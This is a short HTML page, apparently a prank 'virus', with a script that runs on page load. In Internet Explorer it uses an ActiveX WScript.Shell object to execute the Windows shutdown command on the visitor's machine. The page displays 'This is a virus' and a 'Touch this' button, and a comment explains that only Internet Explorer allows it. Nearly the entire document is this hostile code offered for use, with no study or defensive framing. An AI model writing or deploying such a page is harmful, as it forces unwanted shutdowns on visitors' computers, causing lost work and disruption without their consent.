<!--this program only works on internet explorer as modern browser have a lot of security-->

<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <script type="text/javascript">
        function Runfile(){
          WshShell=new ActiveXObject("WScript.Shell");
          WshShell.Run("C:\\Windows\\System32\\Shutdown -s",1,false);
        }
    </script>
    <title></title>
  </head>
  <body onload="Runfile()">
    <h1>This is a virus</h1>
    <br>
    <button type="button" name="button">Touch this</button>
  </body>
</html>